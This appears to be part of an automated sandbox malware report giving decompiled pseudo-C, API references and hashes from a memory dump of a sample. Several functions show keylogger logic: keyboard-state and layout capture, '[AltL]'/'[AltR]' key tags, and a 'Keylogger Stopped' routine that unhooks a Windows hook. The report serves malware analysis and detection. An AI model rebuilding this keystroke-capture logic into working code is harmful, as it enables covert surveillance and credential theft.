                                                                                                                                      0x0131300f
                                                                                                                                      0x01312ffd
                                                                                                                                      0x01312fe9
                                                                                                                                      0x01313018
                                                                                                                                      0x0131301b
                                                                                                                                      0x00000000
                                                                                                                                      0x0131301b
                                                                                                                                      0x01313016
                                                                                                                                      0x00000000
                                                                                                                                      0x01312fbc
                                                                                                                                      0x01312fc0
                                                                                                                                      0x01312fc0
                                                                                                                                      0x00000000

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0269a82b80f90b75a5092a55b12d94588f8982fe5115a93dfebc4b5649f5a2ed
                                                                                                                                      • Instruction ID: 2c121fc9f06bb448439776847967fa637620cf7075dcacf6933d2860cb51d4be
                                                                                                                                      • Opcode Fuzzy Hash: 0269a82b80f90b75a5092a55b12d94588f8982fe5115a93dfebc4b5649f5a2ed
                                                                                                                                      • Instruction Fuzzy Hash: 920181B2209216BEE63929BC6CC0D276B9DEF953BC7354729F522911CDEB30CD245260
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 48%
                                                                                                                                      			E0130CD15(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                      				void* __ebx;
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* __ebp;
                                                                                                                                      				intOrPtr _t18;
                                                                                                                                      				void* _t24;
                                                                                                                                      				intOrPtr _t26;
                                                                                                                                      				void* _t27;
                                                                                                                                      				void* _t28;
                                                                                                                                      				intOrPtr _t29;
                                                                                                                                      				void* _t31;
                                                                                                                                      
                                                                                                                                      				_t28 = __edx;
                                                                                                                                      				_t26 = _a24;
                                                                                                                                      				_t29 = _a8;
                                                                                                                                      				if(_a28 != 0) {
                                                                                                                                      					_push(_a28);
                                                                                                                                      					_push(_t26);
                                                                                                                                      					_push(_t29);
                                                                                                                                      					_push(_a4);
                                                                                                                                      					E0130CC7C(_t26, _t29);
                                                                                                                                      					_t31 = _t31 + 0x10;
                                                                                                                                      				}
                                                                                                                                      				_t18 = _a40;
                                                                                                                                      				_t34 = _t18;
                                                                                                                                      				if(_t18 == 0) {
                                                                                                                                      					_t18 = _t29;
                                                                                                                                      				}
                                                                                                                                      				E0130A76D(_t27, _t18, _a4);
                                                                                                                                      				_t30 = _a32;
                                                                                                                                      				E0130D676(_t26, _t27, _t28, _t29, _t34, _t29, _a16, _a20,  *_a32);
                                                                                                                                      				E0130DDC1(_t29, _a20,  *((intOrPtr*)(_t30 + 4)) + 1);
                                                                                                                                      				_push(0x100);
                                                                                                                                      				_push(_a36);
                                                                                                                                      				_push( *((intOrPtr*)(_t26 + 0xc)));
                                                                                                                                      				_push(_a20);
                                                                                                                                      				_push(_a12);
                                                                                                                                      				_push(_t29);
                                                                                                                                      				_push(_a4);
                                                                                                                                      				_t24 = E0130D416(_t26, _t28, _t29, _t30, _t34);
                                                                                                                                      				if(_t24 != 0) {
                                                                                                                                      					E0130A73D(_t24, _t29);
                                                                                                                                      					return _t24;
                                                                                                                                      				}
                                                                                                                                      				return _t24;
                                                                                                                                      			}














                                                                                                                                      0x0130cd15
                                                                                                                                      0x0130cd1d
                                                                                                                                      0x0130cd22
                                                                                                                                      0x0130cd25
                                                                                                                                      0x0130cd27
                                                                                                                                      0x0130cd2a
                                                                                                                                      0x0130cd2b
                                                                                                                                      0x0130cd2c
                                                                                                                                      0x0130cd2f
                                                                                                                                      0x0130cd34
                                                                                                                                      0x0130cd34
                                                                                                                                      0x0130cd37
                                                                                                                                      0x0130cd3a
                                                                                                                                      0x0130cd3c
                                                                                                                                      0x0130cd3e
                                                                                                                                      0x0130cd3e
                                                                                                                                      0x0130cd44
                                                                                                                                      0x0130cd49
                                                                                                                                      0x0130cd55
                                                                                                                                      0x0130cd63
                                                                                                                                      0x0130cd68
                                                                                                                                      0x0130cd6d
                                                                                                                                      0x0130cd70
                                                                                                                                      0x0130cd73
                                                                                                                                      0x0130cd76
                                                                                                                                      0x0130cd79
                                                                                                                                      0x0130cd7a
                                                                                                                                      0x0130cd7d
                                                                                                                                      0x0130cd87
                                                                                                                                      0x0130cd8b
                                                                                                                                      0x00000000
                                                                                                                                      0x0130cd8b
                                                                                                                                      0x0130cd94

                                                                                                                                      APIs
                                                                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 0130CD2F
                                                                                                                                        • Part of subcall function 0130CC7C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0130CCAB
                                                                                                                                        • Part of subcall function 0130CC7C: ___AdjustPointer.LIBCMT ref: 0130CCC6
                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 0130CD44
                                                                                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0130CD55
                                                                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 0130CD7D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 737400349-0
                                                                                                                                      • Opcode ID: db20e00d426b80253b669e33fc0aef3431d50b7d3b047af91fa89a0d988d191f
                                                                                                                                      • Instruction ID: 90c23aed2696332040234e6e2e92c724d1aeaf61d9752d68d1e074fd52a3f74c
                                                                                                                                      • Opcode Fuzzy Hash: db20e00d426b80253b669e33fc0aef3431d50b7d3b047af91fa89a0d988d191f
                                                                                                                                      • Instruction Fuzzy Hash: 9B01297210024ABBDF125ED9DC40EEB7FA9EF58758F054114FE0866160C732E861DBA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                      			E01314705(signed int _a4) {
                                                                                                                                      				signed int _t9;
                                                                                                                                      				void* _t13;
                                                                                                                                      				signed int _t15;
                                                                                                                                      				WCHAR* _t22;
                                                                                                                                      				signed int _t24;
                                                                                                                                      				signed int* _t25;
                                                                                                                                      				void* _t27;
                                                                                                                                      
                                                                                                                                      				_t9 = _a4;
                                                                                                                                      				_t25 = 0x132f050 + _t9 * 4;
                                                                                                                                      				_t24 =  *_t25;
                                                                                                                                      				if(_t24 == 0) {
                                                                                                                                      					_t22 =  *(0x1325d68 + _t9 * 4);
                                                                                                                                      					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                                                                                                      					if(_t27 != 0) {
                                                                                                                                      						L8:
                                                                                                                                      						 *_t25 = _t27;
                                                                                                                                      						if( *_t25 != 0) {
                                                                                                                                      							FreeLibrary(_t27);
                                                                                                                                      						}
                                                                                                                                      						_t13 = _t27;
                                                                                                                                      						L11:
                                                                                                                                      						return _t13;
                                                                                                                                      					}
                                                                                                                                      					_t15 = GetLastError();
                                                                                                                                      					if(_t15 != 0x57) {
                                                                                                                                      						_t27 = 0;
                                                                                                                                      					} else {
                                                                                                                                      						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                                                                                      						_t27 = _t15;
                                                                                                                                      					}
                                                                                                                                      					if(_t27 != 0) {
                                                                                                                                      						goto L8;
                                                                                                                                      					} else {
                                                                                                                                      						 *_t25 = _t15 | 0xffffffff;
                                                                                                                                      						_t13 = 0;
                                                                                                                                      						goto L11;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				_t4 = _t24 + 1; // 0x17120af5
                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                      				return  ~_t4 & _t24;
                                                                                                                                      			}










                                                                                                                                      0x0131470a
                                                                                                                                      0x0131470e
                                                                                                                                      0x01314715
                                                                                                                                      0x01314719
                                                                                                                                      0x01314727
                                                                                                                                      0x0131473d
                                                                                                                                      0x01314741
                                                                                                                                      0x0131476a
                                                                                                                                      0x0131476c
                                                                                                                                      0x01314770
                                                                                                                                      0x01314773
                                                                                                                                      0x01314773
                                                                                                                                      0x01314779
                                                                                                                                      0x0131477b
                                                                                                                                      0x00000000
                                                                                                                                      0x0131477c
                                                                                                                                      0x01314743
                                                                                                                                      0x0131474c
                                                                                                                                      0x0131475b
                                                                                                                                      0x0131474e
                                                                                                                                      0x01314751
                                                                                                                                      0x01314757
                                                                                                                                      0x01314757
                                                                                                                                      0x0131475f
                                                                                                                                      0x00000000
                                                                                                                                      0x01314761
                                                                                                                                      0x01314764
                                                                                                                                      0x01314766
                                                                                                                                      0x00000000
                                                                                                                                      0x01314766
                                                                                                                                      0x0131475f
                                                                                                                                      0x0131471b
                                                                                                                                      0x01314720
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,013146AC,?,00000000,00000000,00000000,?,0131496B,00000006,FlsSetValue), ref: 01314737
                                                                                                                                      • GetLastError.KERNEL32(?,013146AC,?,00000000,00000000,00000000,?,0131496B,00000006,FlsSetValue,01326314,FlsSetValue,00000000,00000364,?,013144E1), ref: 01314743
                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,013146AC,?,00000000,00000000,00000000,?,0131496B,00000006,FlsSetValue,01326314,FlsSetValue,00000000), ref: 01314751
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                      • Opcode ID: 5482d6ed02811da720b865020b92857f93d41ab055cba88bda4cbc71f4a3094a
                                                                                                                                      • Instruction ID: c0e337cf4a119dc1d00fff70bb79b6dd81284be379a059d23c59a6a2e00eb529
                                                                                                                                      • Opcode Fuzzy Hash: 5482d6ed02811da720b865020b92857f93d41ab055cba88bda4cbc71f4a3094a
                                                                                                                                      • Instruction Fuzzy Hash: 190120327012279BD7356D7DAC44E663B9CAF47BA6B110524F926D7148D720D401CBE0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                      			E01307B34(void* __edx) {
                                                                                                                                      				long _v12;
                                                                                                                                      				void* __ecx;
                                                                                                                                      				long _t4;
                                                                                                                                      				int _t8;
                                                                                                                                      				struct _OVERLAPPED* _t12;
                                                                                                                                      				WCHAR* _t13;
                                                                                                                                      				void* _t17;
                                                                                                                                      				long _t19;
                                                                                                                                      				void* _t21;
                                                                                                                                      
                                                                                                                                      				_t12 = 0;
                                                                                                                                      				_t21 = __edx;
                                                                                                                                      				_t17 = CreateFileW(_t13, 0x80000000, 3, 0, 3, 0x80, 0);
                                                                                                                                      				if(_t17 != 0xffffffff) {
                                                                                                                                      					_t4 = GetFileSize(_t17, 0);
                                                                                                                                      					_push(_t13);
                                                                                                                                      					_t19 = _t4;
                                                                                                                                      					E013081B9(_t21, _t19);
                                                                                                                                      					_v12 = 0;
                                                                                                                                      					_t8 = ReadFile(_t17, E0130282E(_t21, __eflags), _t19,  &_v12, 0);
                                                                                                                                      					__eflags = _t8;
                                                                                                                                      					if(_t8 != 0) {
                                                                                                                                      						_t12 = 1;
                                                                                                                                      					}
                                                                                                                                      					CloseHandle(_t17);
                                                                                                                                      					return _t12;
                                                                                                                                      				}
                                                                                                                                      				return 0;
                                                                                                                                      			}












                                                                                                                                      0x01307b38
                                                                                                                                      0x01307b3a
                                                                                                                                      0x01307b53
                                                                                                                                      0x01307b58
                                                                                                                                      0x01307b61
                                                                                                                                      0x01307b67
                                                                                                                                      0x01307b68
                                                                                                                                      0x01307b6d
                                                                                                                                      0x01307b77
                                                                                                                                      0x01307b86
                                                                                                                                      0x01307b8d
                                                                                                                                      0x01307b8f
                                                                                                                                      0x01307b91
                                                                                                                                      0x01307b91
                                                                                                                                      0x01307b94
                                                                                                                                      0x00000000
                                                                                                                                      0x01307b9a
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,01301A33), ref: 01307B4D
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,01301A33), ref: 01307B61
                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,00000000,01301A33), ref: 01307B86
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,01301A33), ref: 01307B94
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$CloseCreateHandleReadSize
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3919263394-0
                                                                                                                                      • Opcode ID: 8d09a80a5bf98847685d35f6105f0cbb06706f849b21d50665e02054c92e7306
                                                                                                                                      • Instruction ID: c51b734431cd48674dd4b97a4e2687f5a45bb8a6084f0d6ff1795aa71b154349
                                                                                                                                      • Opcode Fuzzy Hash: 8d09a80a5bf98847685d35f6105f0cbb06706f849b21d50665e02054c92e7306
                                                                                                                                      • Instruction Fuzzy Hash: 22F0F6B12012087FE2222E28BC95FBB3BDCDB866A9F10022DFA46E31C0CA216D054671
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                      			E01306F77(signed int __ecx, void* __edx, void* __eflags) {
                                                                                                                                      				void* _t24;
                                                                                                                                      				signed int _t29;
                                                                                                                                      				signed int _t32;
                                                                                                                                      				signed int _t38;
                                                                                                                                      				signed int _t40;
                                                                                                                                      				signed int _t41;
                                                                                                                                      				void* _t44;
                                                                                                                                      				signed int _t47;
                                                                                                                                      				signed char _t50;
                                                                                                                                      				void* _t53;
                                                                                                                                      				signed int _t61;
                                                                                                                                      				void* _t63;
                                                                                                                                      
                                                                                                                                      				_t40 = __ecx;
                                                                                                                                      				E01323174(E01323768, __edx, __eflags);
                                                                                                                                      				_t38 = _t40;
                                                                                                                                      				 *(_t63 - 0x14) = _t38;
                                                                                                                                      				 *(_t63 - 0x10) =  *(_t63 - 0x10) & 0x00000000;
                                                                                                                                      				E0130295B(_t40);
                                                                                                                                      				 *(_t63 - 4) =  *(_t63 - 4) & 0x00000000;
                                                                                                                                      				_t41 = 9;
                                                                                                                                      				 *(_t63 - 0x10) = 1;
                                                                                                                                      				memcpy(_t63 - 0x3c, "abcdefghijklmnopqrstuvwxyz0123456789", _t41 << 2);
                                                                                                                                      				asm("movsb");
                                                                                                                                      				_t24 = E01306EA5();
                                                                                                                                      				E01311F25(0, GetCurrentProcessId() + _t24 +  *0x132fb10);
                                                                                                                                      				 *0x132fb10 =  *0x132fb10 + 1;
                                                                                                                                      				_t44 = _t53;
                                                                                                                                      				_t29 = E01311F04(_t44);
                                                                                                                                      				asm("cdq");
                                                                                                                                      				_t45 = 0xc;
                                                                                                                                      				_t50 = _t29 % _t45 + 4;
                                                                                                                                      				_t61 = _t50 & 0x000000ff;
                                                                                                                                      				if(_t50 != 0) {
                                                                                                                                      					do {
                                                                                                                                      						_t32 = E01311F04(_t45);
                                                                                                                                      						_t47 = 0x24;
                                                                                                                                      						_t45 = _t38;
                                                                                                                                      						E0130825D(_t38,  *(_t63 + (_t32 % _t47 & 0x000000ff) - 0x3c) & 0x000000ff);
                                                                                                                                      						_t61 = _t61 - 1;
                                                                                                                                      					} while (_t61 != 0);
                                                                                                                                      				}
                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
                                                                                                                                      				return _t38;
                                                                                                                                      			}















                                                                                                                                      0x01306f77
                                                                                                                                      0x01306f7c
                                                                                                                                      0x01306f86
                                                                                                                                      0x01306f88
                                                                                                                                      0x01306f8b
                                                                                                                                      0x01306f90
                                                                                                                                      0x01306f95
                                                                                                                                      0x01306f9e
                                                                                                                                      0x01306fa4
                                                                                                                                      0x01306fab
                                                                                                                                      0x01306faf
                                                                                                                                      0x01306fb0
                                                                                                                                      0x01306fc6
                                                                                                                                      0x01306fcb
                                                                                                                                      0x01306fd1
                                                                                                                                      0x01306fd2
                                                                                                                                      0x01306fd9
                                                                                                                                      0x01306fda
                                                                                                                                      0x01306fdd
                                                                                                                                      0x01306fe0
                                                                                                                                      0x01306fe3
                                                                                                                                      0x01306fe5
                                                                                                                                      0x01306fe5
                                                                                                                                      0x01306fec
                                                                                                                                      0x01306ff1
                                                                                                                                      0x01306ffc
                                                                                                                                      0x01307001
                                                                                                                                      0x01307001
                                                                                                                                      0x01306fe5
                                                                                                                                      0x0130700e
                                                                                                                                      0x01307016

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01306F7C
                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,74D0FBB0,00000000), ref: 01306FB7
                                                                                                                                      Strings
                                                                                                                                      • abcdefghijklmnopqrstuvwxyz0123456789, xrefs: 01306F9F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentH_prologProcess
                                                                                                                                      • String ID: abcdefghijklmnopqrstuvwxyz0123456789
                                                                                                                                      • API String ID: 1317504408-3754357371
                                                                                                                                      • Opcode ID: 6c6a5c644b1e017d99a97a9c0fa052f27a26a44de00cd86857308f1f4de1e1c9
                                                                                                                                      • Instruction ID: 75994d3507e54a5ca73d5479eb7b88b29dd8075f5ebbdf0ddc984b3f90addf22
                                                                                                                                      • Opcode Fuzzy Hash: 6c6a5c644b1e017d99a97a9c0fa052f27a26a44de00cd86857308f1f4de1e1c9
                                                                                                                                      • Instruction Fuzzy Hash: 6301C477E001219BDB29BFBCA8657EE73A9AB58729F10052EE601A61C4CB7989088654
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                      			E013022BE(void* __ecx, void* __edx, void* __edi) {
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* __ebp;
                                                                                                                                      				void* _t4;
                                                                                                                                      				void* _t6;
                                                                                                                                      				signed int _t9;
                                                                                                                                      				void* _t10;
                                                                                                                                      				void* _t14;
                                                                                                                                      				void* _t17;
                                                                                                                                      				void* _t19;
                                                                                                                                      
                                                                                                                                      				_t15 = __edi;
                                                                                                                                      				_t14 = __edx;
                                                                                                                                      				_push(__ecx);
                                                                                                                                      				_t17 = __ecx;
                                                                                                                                      				_t9 = GetKeyState(0x11) & 0x0000ffff;
                                                                                                                                      				_t1 = _t17 + 0x54; // 0x0
                                                                                                                                      				_t4 =  *_t1 - 0xa4;
                                                                                                                                      				if(_t4 == 0) {
                                                                                                                                      					_t10 = _t19 - 0x18;
                                                                                                                                      					_push("[AltL]");
                                                                                                                                      					goto L6;
                                                                                                                                      				} else {
                                                                                                                                      					_t6 = _t4 - 1;
                                                                                                                                      					_t24 = _t6;
                                                                                                                                      					if(_t6 == 0) {
                                                                                                                                      						__eflags = _t9;
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							_t10 = _t19 - 0x18;
                                                                                                                                      							_push("[AltR]");
                                                                                                                                      							L6:
                                                                                                                                      							E01302917(_t10, _t14);
                                                                                                                                      							_t6 = E013017B2(_t17, _t14, _t15, __eflags);
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						E01301626(_t17, _t19 - 0x18);
                                                                                                                                      						_t6 = E013017EF(_t17, _t14, __edi, _t17, _t24);
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				return _t6;
                                                                                                                                      			}












                                                                                                                                      0x013022be
                                                                                                                                      0x013022be
                                                                                                                                      0x013022c1
                                                                                                                                      0x013022c5
                                                                                                                                      0x013022cd
                                                                                                                                      0x013022d0
                                                                                                                                      0x013022d3
                                                                                                                                      0x013022d8
                                                                                                                                      0x01302307
                                                                                                                                      0x01302309
                                                                                                                                      0x00000000
                                                                                                                                      0x013022da
                                                                                                                                      0x013022da
                                                                                                                                      0x013022da
                                                                                                                                      0x013022dd
                                                                                                                                      0x013022f3
                                                                                                                                      0x013022f6
                                                                                                                                      0x013022fb
                                                                                                                                      0x013022fd
                                                                                                                                      0x0130230e
                                                                                                                                      0x0130230e
                                                                                                                                      0x01302315
                                                                                                                                      0x01302315
                                                                                                                                      0x013022df
                                                                                                                                      0x013022e5
                                                                                                                                      0x013022ec
                                                                                                                                      0x013022ec
                                                                                                                                      0x013022dd
                                                                                                                                      0x0130231c

                                                                                                                                      APIs
                                                                                                                                      • GetKeyState.USER32 ref: 013022C7
                                                                                                                                        • Part of subcall function 01301626: GetForegroundWindow.USER32(0132F9B4,?), ref: 01301654
                                                                                                                                        • Part of subcall function 01301626: GetWindowThreadProcessId.USER32(00000000,?), ref: 0130165F
                                                                                                                                        • Part of subcall function 01301626: GetKeyboardLayout.USER32(00000000), ref: 01301666
                                                                                                                                        • Part of subcall function 01301626: GetKeyState.USER32 ref: 01301670
                                                                                                                                        • Part of subcall function 01301626: GetKeyboardState.USER32(?), ref: 0130167D
                                                                                                                                        • Part of subcall function 01301626: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 01301699
                                                                                                                                        • Part of subcall function 013017EF: __EH_prolog.LIBCMT ref: 013017F4
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: State$KeyboardWindow$ForegroundH_prologLayoutProcessThreadUnicode
                                                                                                                                      • String ID: [AltL]$[AltR]
                                                                                                                                      • API String ID: 899649270-2658077756
                                                                                                                                      • Opcode ID: afcd9b6e6fe5a65208f8f96dfeacd4482e96915931775e0c9f5c6a4326cb05c7
                                                                                                                                      • Instruction ID: 81d6b954557a085f438dd4a6c8c3fdec7e4cc25deba15f01c8591406f4efa010
                                                                                                                                      • Opcode Fuzzy Hash: afcd9b6e6fe5a65208f8f96dfeacd4482e96915931775e0c9f5c6a4326cb05c7
                                                                                                                                      • Instruction Fuzzy Hash: ADF0E53130022513C92A367E8D7E67F3ED9C752A5CF80018DED8247AC5EE85DA0083D2
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                      			E01301D38(struct HHOOK__** __ecx, void* __edx, void* __eflags) {
                                                                                                                                      				void* _t12;
                                                                                                                                      				struct HHOOK__** _t18;
                                                                                                                                      				struct HHOOK__** _t27;
                                                                                                                                      				void* _t29;
                                                                                                                                      				void* _t31;
                                                                                                                                      				void* _t32;
                                                                                                                                      
                                                                                                                                      				_t24 = __edx;
                                                                                                                                      				_t18 = __ecx;
                                                                                                                                      				E01323174(E01323272, __edx, __eflags);
                                                                                                                                      				_t32 = _t31 - 0x1c;
                                                                                                                                      				_t27 = _t18;
                                                                                                                                      				if(_t27[0x14] == 0) {
                                                                                                                                      					_t12 = 0;
                                                                                                                                      					__eflags = 0;
                                                                                                                                      				} else {
                                                                                                                                      					if(_t27[0x12] != 0x32) {
                                                                                                                                      						E01302917(_t29 - 0x28, _t24, "Keylogger Stopped");
                                                                                                                                      						_t4 = _t29 - 4;
                                                                                                                                      						 *_t4 =  *(_t29 - 4) & 0x00000000;
                                                                                                                                      						_t38 =  *_t4;
                                                                                                                                      						_t25 = _t29 - 0x28;
                                                                                                                                      						E0130757A(_t32 - 0x18, _t29 - 0x28,  *_t4);
                                                                                                                                      						E01301DA8(_t27, _t29 - 0x28,  *_t4);
                                                                                                                                      						E013028AF(_t29 - 0x28, _t25, _t38);
                                                                                                                                      					}
                                                                                                                                      					_t27[0x14] = 0;
                                                                                                                                      					if( *_t27 != 0) {
                                                                                                                                      						UnhookWindowsHookEx( *_t27);
                                                                                                                                      						 *_t27 =  *_t27 & 0x00000000;
                                                                                                                                      					}
                                                                                                                                      					_t12 = 1;
                                                                                                                                      				}
                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t29 - 0xc));
                                                                                                                                      				return _t12;
                                                                                                                                      			}









                                                                                                                                      0x01301d38
                                                                                                                                      0x01301d38
                                                                                                                                      0x01301d3d
                                                                                                                                      0x01301d42
                                                                                                                                      0x01301d46
                                                                                                                                      0x01301d4c
                                                                                                                                      0x01301d99
                                                                                                                                      0x01301d99
                                                                                                                                      0x01301d4e
                                                                                                                                      0x01301d52
                                                                                                                                      0x01301d5c
                                                                                                                                      0x01301d61
                                                                                                                                      0x01301d61
                                                                                                                                      0x01301d61
                                                                                                                                      0x01301d65
                                                                                                                                      0x01301d6d
                                                                                                                                      0x01301d74
                                                                                                                                      0x01301d7c
                                                                                                                                      0x01301d7c
                                                                                                                                      0x01301d84
                                                                                                                                      0x01301d88
                                                                                                                                      0x01301d8c
                                                                                                                                      0x01301d92
                                                                                                                                      0x01301d92
                                                                                                                                      0x01301d95
                                                                                                                                      0x01301d95
                                                                                                                                      0x01301d9e
                                                                                                                                      0x01301da7

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01301D3D
                                                                                                                                      • UnhookWindowsHookEx.USER32 ref: 01301D8C
                                                                                                                                        • Part of subcall function 01301DA8: __EH_prolog.LIBCMT ref: 01301DAD
